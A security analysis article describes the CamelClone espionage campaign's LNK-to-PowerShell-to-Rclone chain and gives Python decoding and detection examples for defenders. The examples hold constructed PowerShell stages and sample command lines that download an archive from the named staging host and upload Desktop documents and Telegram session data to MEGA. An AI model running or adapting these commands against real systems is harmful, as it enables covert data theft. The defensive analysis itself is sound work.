
Critical CamelClone Spies via File‑Sharing and Rclone

A sophisticated espionage operation tracked as Operation CamelClone is actively targeting government, defense, and diplomatic organizations across Algeria, Mongolia, Ukraine, and Kuwait, using public file‑sharing infrastructure and the legitimate cloud tool Rclone to steal sensitive data.

First observed in late February 2026, the campaign surfaced when a suspicious ZIP archive named after Algeria’s Ministry of Housing, Urban Development, and the City was uploaded to VirusTotal on February 24. Soon after, a second lure aimed at Mongolia referenced “Expanding cooperation with China,” followed by additional samples themed around Algeria–Ukraine cooperation and a Kuwait Air Force procurement decoy—evidence of a wide, geopolitically aware targeting footprint.

Security researchers at Seqrite emphasize that, while the victim set seems geographically diverse, each country sits at a strategic junction in today’s geopolitical landscape—an alignment that strongly signals intelligence collection, not cybercrime for profit.


🎯 Targeting & Lures

Across all observed waves, spear‑phishing ZIP attachments mimic official government correspondence and embed a Windows shortcut (LNK) next to a convincing decoy image (e.g., Algerian ministry insignia, MonAtom LLC branding in Mongolia, or Kuwait Armed Forces crests). Opening the shortcut quietly triggers a PowerShell command that advances the infection without user awareness.

What makes CamelClone unusually stealthy is its absence of bespoke C2 servers. Payloads are hosted on the public file‑sharing site filebulldogs[.]com, while exfiltration runs through MEGA cloud storage—traffic that blends with normal enterprise activity and evades many network‑based detections.


🔗 Inside the Infection Chain

  1. LNK ➜ PowerShell ➜ HOPPINGANT
    The LNK executes hidden PowerShell to download a JavaScript loader—HOPPINGANT—from filebulldogs[.]com and run it via Windows Script Host.
  2. Dual PowerShell Stage & Decoys
    HOPPINGANT launches two Base64‑encoded PowerShell commands: one fetches a null‑padded decoy PDF to distract the user; the other retrieves an archive (a.zip) containing a portable Rclone v1.70.3 binary.
  3. Rclone‑Powered Data Theft
    The script XOR‑decodes a stored password (single‑byte key 56) to authenticate to a MEGA account registered with an onionmail[.]org address, then scans the Desktop for .doc/.docx/.pdf/.txt files and uploads them to attacker‑controlled storage. Telegram Desktop session data (the tdata folder) is also collected, which can expose private conversations if the session is replayed. Researchers identified four MEGA accounts created between February and March 2026, suggesting parallel tasking across several operations.

This design—public hosting + cloud exfiltration + living‑off‑the‑land tools—avoids noisy infrastructure and leverages enterprise‑permitted services to persist and steal with minimal signals.
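To make the staging concrete, here is an added offline triage helper (my example, not Seqrite's tooling and not code from the samples) that reverses the pieces the chain relies on: Base64 over UTF‑16LE decoding of a PowerShell -EncodedCommand stage, URL extraction with defanging, recovery of a password stored as an XOR‑encoded byte array, and extraction of the rclone backend and account name. The two stages it processes are constructed to have the shape described above; the URL paths, the rclone command line, the account placeholder and the encoded password bytes are all assumptions, and "key 56" is taken as decimal (0x38).

```python
"""Offline triage of a two-stage -EncodedCommand pattern (added example).

Nothing here is the real CamelClone code: the two stages are CONSTRUCTED
below with encode_ps() so the decoding path can be exercised offline.
Assumptions: -EncodedCommand is Base64 over UTF-16LE (standard PowerShell),
the password is XOR-encoded with single-byte key 56 (decimal, i.e. 0x38),
and the paths, rclone invocation and account placeholder are invented.
"""
import base64
import re

URL_RE = re.compile(r"https?://[^\s'\"()]+")
XOR_RE = re.compile(r"-bxor\s+(\d+)", re.IGNORECASE)
# A PowerShell byte-array literal such as (0x6b,0x0b,...) feeding the XOR loop.
BYTES_RE = re.compile(r"\(\s*((?:0x[0-9a-fA-F]{2}\s*,\s*)+0x[0-9a-fA-F]{2})\s*\)")
# "rclone config create <name> <backend> user <account> ..." (rclone CLI syntax).
RCLONE_RE = re.compile(r"config\s+create\s+\S+\s+(\S+)\s+user\s+'?([^'\s]+)'?", re.IGNORECASE)


def encode_ps(cmd: str) -> str:
    """Build a -EncodedCommand argument; used only to construct the samples."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_ps(b64: str) -> str:
    """Reverse -EncodedCommand: Base64 -> UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def defang(url: str) -> str:
    """Make an extracted URL safe to paste into a report."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def xor_decode(blob: bytes, key: int) -> str:
    """Single-byte XOR, the scheme the write-up attributes to the loader."""
    return bytes(b ^ key for b in blob).decode("ascii", errors="replace")


def triage_stage(b64: str) -> dict:
    """Decode one encoded stage and pull out what an analyst needs from it."""
    cmd = decode_ps(b64)
    out = {
        "urls": [defang(u) for u in URL_RE.findall(cmd)],
        "xor_key": None,
        "secret": None,
        "remote_backend": None,
        "remote_user": None,
    }
    m = XOR_RE.search(cmd)
    if m:
        out["xor_key"] = int(m.group(1))
        b = BYTES_RE.search(cmd)
        if b:
            blob = bytes(int(h, 16) for h in re.findall(r"0x[0-9a-fA-F]{2}", b.group(1)))
            out["secret"] = xor_decode(blob, out["xor_key"])
    r = RCLONE_RE.search(cmd)
    if r:
        out["remote_backend"], out["remote_user"] = r.group(1), r.group(2)
    return out


# Constructed stage 1: fetch and open a decoy document (path invented).
STAGE_DECOY = encode_ps(
    "Invoke-WebRequest -Uri 'https://filebulldogs.com/decoy.pdf' "
    "-OutFile \"$env:TEMP\\decoy.pdf\"; Start-Process \"$env:TEMP\\decoy.pdf\""
)

# Constructed stage 2: fetch a.zip, unpack rclone, XOR-decode the password
# (0x6b,0x0b,... is "S3cret!" XOR 0x38, a made-up value), configure a MEGA
# remote and upload Desktop documents.  Account placeholder is not real.
STAGE_EXFIL = encode_ps(
    "Invoke-WebRequest -Uri 'https://filebulldogs.com/a.zip' -OutFile \"$env:TEMP\\a.zip\"; "
    "Expand-Archive \"$env:TEMP\\a.zip\" \"$env:TEMP\\r\"; "
    "$p = -join ([byte[]](0x6b,0x0b,0x5b,0x4a,0x5d,0x4c,0x19) | ForEach-Object { [char]($_ -bxor 56) }); "
    "& \"$env:TEMP\\r\\rclone.exe\" config create m mega user '<account>@onionmail.org' pass $p; "
    "& \"$env:TEMP\\r\\rclone.exe\" copy \"$env:USERPROFILE\\Desktop\" m: --include '*.{doc,docx,pdf,txt}'"
)

if __name__ == "__main__":
    for name, stage in (("decoy", STAGE_DECOY), ("exfil", STAGE_EXFIL)):
        print(name, triage_stage(stage))
```

On a live case the input is the Base64 string captured from Sysmon Event ID 1 or PowerShell Script Block Logging; the regexes are deliberately loose because the loader is free to vary variable names, and the recovered password should go straight to the takedown request, not into a report body.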


🌍 Why These Countries?

Seqrite’s analysis connects CamelClone’s victim set to timely strategic value:

  • Ukraine amid ongoing armed conflict and hybrid activity;
  • Algeria as a pivotal energy supplier straddling European–African–Russian interests;
  • Mongolia balancing China–Russia influence while engaging Western partners;
  • Kuwait as a key Gulf defense player.

The consistent lures—government letters, cooperation proposals, and defense procurement—mirror active policy lines, reinforcing an espionage objective.


🧪 Technical Highlights (at a Glance)

  • Delivery: Spear‑phishing ZIP with LNK + official‑looking decoy image.
  • Loader: HOPPINGANT JavaScript via Windows Script Host.
  • Staging: Payloads on filebulldogs[.]com; no dedicated C2.
  • Exfiltration: Rclone v1.70.3 to MEGA; credentials decoded (XOR key 56); onionmail[.]org accounts.
  • Collections: Desktop .doc/.docx/.pdf/.txt; Telegram tdata sessions.

🛡 Recommended Mitigations

  1. Treat unsolicited ZIPs as hostile by default—especially those invoking ministries, foreign cooperation, or procurement themes. Implement file‑type controls and sandbox detonation for archives with LNK content.
  2. Block or restrict anonymous file‑sharing sites (e.g., filebulldogs[.]com) and apply egress filtering for MEGA and similar cloud storage—alert on new/rare destinations and bulk uploads.
  3. Use AppLocker/WDAC to limit what a shortcut can launch rather than the LNK file itself (AppLocker does not govern .lnk): deny wscript.exe/cscript.exe and unsigned .js scripts for standard users, and restrict PowerShell to administrators where feasible. Harden PowerShell with Constrained Language Mode, Script Block Logging, and AMSI. Behavior‑based EDR should flag the chained LNK ➜ PowerShell ➜ WSH pattern.
  4. Hunt for HOPPINGANT & Rclone usage
    • Look for PowerShell fetching .js from filebulldogs[.]com.
    • Detect portable Rclone binaries launching with MEGA remotes; match on the binary's OriginalFileName (rclone.exe) as well as the image name, since renaming the executable costs the attacker nothing.
    • Alert on Script Block Logging entries (Event ID 4104) containing -bxor decode loops, and on any process other than Telegram Desktop reading the tdata directory.
  5. User awareness for diplomatic & defense teams
    Tailor training to government‑themed lures, emphasizing the risk of ZIP/LNK open rates and how to report suspicious “official” correspondence.
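The hunting items above can be expressed as rules over process‑creation telemetry. The following added example (my code, not Seqrite's or any vendor's rule set) runs them over a handful of constructed Sysmon Event ID 1 style records: the GUIDs, paths and command lines are invented, while the staging domain, the collected file types and the Telegram tdata path come from the write‑up. It keys on Sysmon's OriginalFileName so a renamed rclone.exe is still caught, and walks ParentProcessGuid links to confirm the whole chain rather than alerting on Rclone alone.

```python
"""Process-chain detection for LNK -> PowerShell -> WSH -> Rclone (added example).

Records are CONSTRUCTED Sysmon EventID 1 entries trimmed to the fields the
rules need: ProcessGuid, ParentProcessGuid, Image, OriginalFileName,
CommandLine.  GUIDs, paths and command lines are invented for illustration.
"""
import re

PS = {"powershell.exe", "pwsh.exe"}
WSH = {"wscript.exe", "cscript.exe"}
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
STAGING_JS = re.compile(r"filebulldogs\.com/\S*\.js", re.IGNORECASE)
ENCODED = re.compile(r"\s-e(?:nc|ncodedcommand)?\s", re.IGNORECASE)
TRANSFER = re.compile(r"\b(?:copy|sync|move|copyto|moveto)\b", re.IGNORECASE)
# An rclone "remote:path" argument; a drive letter followed by \ or / is excluded.
REMOTE_ARG = re.compile(r"\s[A-Za-z0-9_-]+:(?![\\/])\S*(?=\s|$)")


def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev: dict, by_guid: dict) -> list:
    """Image names from the process itself up to the root, child first."""
    chain, seen, cur = [], set(), ev
    while cur and cur["guid"] not in seen:
        seen.add(cur["guid"])
        chain.append(base(cur["image"]))
        cur = by_guid.get(cur.get("parent_guid"))
    return chain


def detect(events: list) -> list:
    """Return (rule_name, process_guid) pairs for every record that trips a rule."""
    by_guid = {e["guid"]: e for e in events}
    alerts = []
    for e in events:
        img, cmd = base(e["image"]), e["cmdline"]
        orig = e.get("original_filename", "").lower()
        lineage = ancestry(e, by_guid)
        parent = lineage[1] if len(lineage) > 1 else ""
        # Shortcut double-click: explorer spawns hidden PowerShell pulling a .js loader.
        if img in PS and parent == "explorer.exe" and HIDDEN.search(cmd) and STAGING_JS.search(cmd):
            alerts.append(("lnk_powershell_fetches_js", e["guid"]))
        # HOPPINGANT-style loader: script host launched by PowerShell ...
        if img in WSH and parent in PS:
            alerts.append(("powershell_spawns_wsh", e["guid"]))
        # ... which in turn runs Base64-encoded PowerShell stages.
        if img in PS and parent in WSH and ENCODED.search(cmd):
            alerts.append(("wsh_spawns_encoded_powershell", e["guid"]))
        is_rclone = img == "rclone.exe" or orig == "rclone.exe"
        if is_rclone:
            low = cmd.lower()
            if "mega" in low or "onionmail.org" in low:
                alerts.append(("rclone_mega_account", e["guid"]))
            if TRANSFER.search(cmd) and REMOTE_ARG.search(cmd):
                alerts.append(("rclone_remote_transfer", e["guid"]))
            if PS & set(lineage) and WSH & set(lineage):
                alerts.append(("camelclone_chain", e["guid"]))
        if "telegram desktop\\tdata" in cmd.lower() and img != "telegram.exe":
            alerts.append(("telegram_tdata_access", e["guid"]))
    return alerts


PSEXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RCLONE_RENAMED = r"C:\Users\u\AppData\Local\Temp\r\svc.exe"
EVENTS = [  # constructed; "B" records are benign controls
    dict(guid="E1", parent_guid=None, image=r"C:\Windows\explorer.exe", original_filename="EXPLORER.EXE", cmdline="explorer.exe"),
    dict(guid="P1", parent_guid="E1", image=PSEXE, original_filename="PowerShell.EXE",
         cmdline='powershell.exe -w hidden -c "iwr https://filebulldogs.com/l.js -OutFile $env:TEMP\\l.js; wscript $env:TEMP\\l.js"'),
    dict(guid="W1", parent_guid="P1", image=r"C:\Windows\System32\wscript.exe", original_filename="wscript.exe",
         cmdline=r"wscript C:\Users\u\AppData\Local\Temp\l.js"),
    dict(guid="P2", parent_guid="W1", image=PSEXE, original_filename="PowerShell.EXE", cmdline="powershell.exe -nop -w hidden -enc SQBuAHYA..."),
    dict(guid="R0", parent_guid="P2", image=RCLONE_RENAMED, original_filename="rclone.exe",
         cmdline="svc.exe config create m mega user <account>@onionmail.org pass <obscured>"),
    dict(guid="R1", parent_guid="P2", image=RCLONE_RENAMED, original_filename="rclone.exe",
         cmdline=r"svc.exe copy C:\Users\u\Desktop m: --include *.{doc,docx,pdf,txt}"),
    dict(guid="R2", parent_guid="P2", image=RCLONE_RENAMED, original_filename="rclone.exe",
         cmdline=r'svc.exe copy "C:\Users\u\AppData\Roaming\Telegram Desktop\tdata" m:tg'),
    dict(guid="B1", parent_guid="E1", image=PSEXE, original_filename="PowerShell.EXE", cmdline="powershell.exe -NoProfile -Command Get-Date"),
    dict(guid="C1", parent_guid="E1", image=r"C:\Windows\System32\cmd.exe", original_filename="Cmd.Exe", cmdline="cmd.exe"),
    dict(guid="B2", parent_guid="C1", image=r"C:\Tools\rclone.exe", original_filename="rclone.exe", cmdline=r"rclone.exe sync D:\backup s3:bucket"),
]

if __name__ == "__main__":
    for rule, guid in detect(EVENTS):
        print(f"{rule:32} {guid}")
```

The benign backup job (B2) still raises rclone_remote_transfer, which is intended: in a government or defense estate any Rclone execution deserves a look, but only the records with PowerShell and a script host in their ancestry get the camelclone_chain label that should page someone. If you only have Security 4688 events, the chain rules still work off ParentProcessName, but the OriginalFileName check needs Sysmon or EDR telemetry.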

Conclusion

Operation CamelClone exemplifies modern cloud‑enabled espionage: credible government lures, public file‑sharing for staging, and Rclone‑to‑MEGA exfiltration that blends with normal traffic. The uniform infection chain, geopolitically tuned decoys, and disciplined use of commodity tools underline a campaign designed for quiet persistence and scalable theft—not smash‑and‑grab cybercrime.

Security teams in government, defense, and diplomatic environments should tighten controls on archive/shortcut files, curb access to anonymous hosting sites, and instrument detection for the precise LNK→PowerShell→WSH→Rclone sequence CamelClone depends on.
